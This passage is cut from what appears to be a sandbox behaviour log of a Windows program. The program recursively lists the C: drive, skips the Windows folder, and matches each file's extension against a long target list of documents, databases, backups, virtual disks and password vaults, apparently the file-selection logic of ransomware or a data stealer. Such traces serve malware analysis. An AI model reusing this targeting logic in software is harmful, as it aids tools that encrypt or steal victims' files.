PathFindExtensionW (pszPath="Documents and Settings") returned="" [0039.861] FindNextFileW (in: hFindFile=0x54abe0, lpFindFileData=0x2e4efa8 | out: lpFindFileData=0x2e4efa8) returned 1 [0039.861] PathCombineW (in: pszDest=0x2e4f1f8, pszDir="C:\\", pszFile="hiberfil.sys" | out: pszDest="C:\\hiberfil.sys") returned="C:\\hiberfil.sys" [0039.861] PathFindExtensionW (pszPath="hiberfil.sys") returned=".sys" [0039.861] wsprintfW (in: param_1=0x2e4f608, param_2="%ws." | out: param_1=".sys.") returned 5 [0039.861] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".sys.") returned 0x0 [0039.861] FindNextFileW (in: hFindFile=0x54abe0, lpFindFileData=0x2e4efa8 | out: lpFindFileData=0x2e4efa8) returned 1 [0039.861] PathCombineW (in: pszDest=0x2e4f1f8, pszDir="C:\\", pszFile="pagefile.sys" | out: pszDest="C:\\pagefile.sys") returned="C:\\pagefile.sys" [0039.861] PathFindExtensionW (pszPath="pagefile.sys") returned=".sys" [0039.861] wsprintfW (in: param_1=0x2e4f608, param_2="%ws." | out: param_1=".sys.") returned 5 [0039.861] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".sys.") returned 0x0 [0039.862] FindNextFileW (in: hFindFile=0x54abe0, lpFindFileData=0x2e4efa8 | out: lpFindFileData=0x2e4efa8) returned 1 [0039.862] PathCombineW (in: pszDest=0x2e4f1f8, pszDir="C:\\", pszFile="PerfLogs" | out: pszDest="C:\\PerfLogs") returned="C:\\PerfLogs" [0039.862] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\PerfLogs") returned 0x0 [0039.862] PathCombineW (in: pszDest=0x2e4eb70, pszDir="C:\\PerfLogs", pszFile="*" | out: pszDest="C:\\PerfLogs\\*") returned="C:\\PerfLogs\\*" [0039.862] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\*", lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 0x54ac60 [0039.862] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.862] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.862] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\PerfLogs", pszFile="Admin" | out: pszDest="C:\\PerfLogs\\Admin") returned="C:\\PerfLogs\\Admin" [0039.862] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\PerfLogs\\Admin") returned 0x0 [0039.862] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\PerfLogs\\Admin", pszFile="*" | out: pszDest="C:\\PerfLogs\\Admin\\*") returned="C:\\PerfLogs\\Admin\\*" [0039.862] FindFirstFileW (in: lpFileName="C:\\PerfLogs\\Admin\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.863] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.863] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0 [0039.863] FindClose (in: hFindFile=0x54ace0 | out: hFindFile=0x54ace0) returned 1 [0039.863] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 0 [0039.863] FindClose (in: hFindFile=0x54ac60 | out: hFindFile=0x54ac60) returned 1 [0039.863] FindNextFileW (in: hFindFile=0x54abe0, lpFindFileData=0x2e4efa8 | out: lpFindFileData=0x2e4efa8) returned 1 [0039.863] PathCombineW (in: pszDest=0x2e4f1f8, pszDir="C:\\", pszFile="Program Files" | out: pszDest="C:\\Program Files") returned="C:\\Program Files" [0039.863] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files") returned 0x0 [0039.863] PathCombineW (in: pszDest=0x2e4eb70, pszDir="C:\\Program Files", pszFile="*" | out: pszDest="C:\\Program Files\\*") returned="C:\\Program Files\\*" [0039.863] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 0x54ac60 [0039.864] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.864] FindNextFileW (in: hFindFile=0x54ac60, lpFindFileData=0x2e4e718 | out: lpFindFileData=0x2e4e718) returned 1 [0039.864] PathCombineW (in: pszDest=0x2e4e968, pszDir="C:\\Program Files", pszFile="Common Files" | out: pszDest="C:\\Program Files\\Common Files") returned="C:\\Program Files\\Common Files" [0039.864] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files") returned 0x0 [0039.864] PathCombineW (in: pszDest=0x2e4e2e0, pszDir="C:\\Program Files\\Common Files", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\*") returned="C:\\Program Files\\Common Files\\*" [0039.864] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\*", lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 0x54ace0 [0039.864] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.864] FindNextFileW (in: hFindFile=0x54ace0, lpFindFileData=0x2e4de88 | out: lpFindFileData=0x2e4de88) returned 1 [0039.864] PathCombineW (in: pszDest=0x2e4e0d8, pszDir="C:\\Program Files\\Common Files", pszFile="Microsoft Shared" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared") returned="C:\\Program Files\\Common Files\\Microsoft Shared" [0039.864] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared") returned 0x0 [0039.865] PathCombineW (in: pszDest=0x2e4da50, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\*" [0039.865] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\*", lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 0x54ad20 [0039.865] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0039.865] FindNextFileW (in: hFindFile=0x54ad20, lpFindFileData=0x2e4d5f8 | out: lpFindFileData=0x2e4d5f8) returned 1 [0039.865] PathCombineW (in: pszDest=0x2e4d848, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared", pszFile="ink" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink" [0039.865] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 0x0 [0039.865] PathCombineW (in: pszDest=0x2e4d1c0, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*" [0039.865] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*", lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 0x54ad60 [0039.865] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.866] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.866] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="Alphabet.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Alphabet.xml" [0039.866] PathFindExtensionW (pszPath="Alphabet.xml") returned=".xml" [0039.866] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.866] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.866] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.866] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ar-SA" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA" [0039.866] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA") returned 0x0 [0039.866] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*" [0039.866] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.868] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.868] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.868] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ar-SA\\tipresx.dll.mui" [0039.868] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.868] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.869] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.869] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.869] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.869] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.869] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="bg-BG" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG" [0039.869] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG") returned 0x0 [0039.869] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*" [0039.869] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.870] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.870] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.870] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" [0039.870] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.870] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.870] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.870] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.870] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.870] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.870] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="Content.xml" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" [0039.870] PathFindExtensionW (pszPath="Content.xml") returned=".xml" [0039.870] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".xml.") returned 5 [0039.870] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".xml.") returned 0x0 [0039.870] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.870] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="ConvertInkStore.exe" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ConvertInkStore.exe" [0039.870] PathFindExtensionW (pszPath="ConvertInkStore.exe") returned=".exe" [0039.870] wsprintfW (in: param_1=0x2e4d3c8, param_2="%ws." | out: param_1=".exe.") returned 5 [0039.871] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".exe.") returned 0x0 [0039.871] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.871] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="cs-CZ" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ" [0039.871] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ") returned 0x0 [0039.871] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*" [0039.871] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.871] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.871] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.871] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\tipresx.dll.mui" [0039.871] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.871] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.872] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.872] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.872] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.872] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.872] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="da-DK" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK" [0039.872] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK") returned 0x0 [0039.872] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*" [0039.872] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.872] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.873] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.873] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" [0039.873] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.873] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.873] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.873] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.873] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.873] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.873] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="de-DE" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE" [0039.873] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE") returned 0x0 [0039.873] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*" [0039.873] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.874] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.874] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.874] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" [0039.874] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.874] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.874] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.874] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.874] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.874] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.874] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="el-GR" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR" [0039.874] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR") returned 0x0 [0039.874] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*" [0039.874] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*", lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0x54ada0 [0039.875] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.875] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 1 [0039.875] PathCombineW (in: pszDest=0x2e4c728, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR", pszFile="tipresx.dll.mui" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\tipresx.dll.mui" [0039.875] PathFindExtensionW (pszPath="tipresx.dll.mui") returned=".mui" [0039.875] wsprintfW (in: param_1=0x2e4cb38, param_2="%ws." | out: param_1=".mui.") returned 5 [0039.875] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asp.aspx.avhd.back.bak.c.cfg.conf.cpp.cs.ctl.dbf.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.kdbx.mail.mdb.msg.nrg.ora.ost.ova.ovf.pdf.php.pmf.ppt.pptx.pst.pvi.py.pyc.rar.rtf.sln.sql.tar.vbox.vbs.vcb.vdi.vfd.vmc.vmdk.vmsd.vmx.vsdx.vsv.work.xls.xlsx.xvd.zip.", lpSrch=".mui.") returned 0x0 [0039.875] FindNextFileW (in: hFindFile=0x54ada0, lpFindFileData=0x2e4c4d8 | out: lpFindFileData=0x2e4c4d8) returned 0 [0039.875] FindClose (in: hFindFile=0x54ada0 | out: hFindFile=0x54ada0) returned 1 [0039.875] FindNextFileW (in: hFindFile=0x54ad60, lpFindFileData=0x2e4cd68 | out: lpFindFileData=0x2e4cd68) returned 1 [0039.876] PathCombineW (in: pszDest=0x2e4cfb8, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink", pszFile="en-US" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" [0039.876] StrStrIW (lpFirst="C:\\Windows;", lpSrch="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 0x0 [0039.876] PathCombineW (in: pszDest=0x2e4c930, pszDir="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", pszFile="*" | out: pszDest="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*" [0039.876] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*", 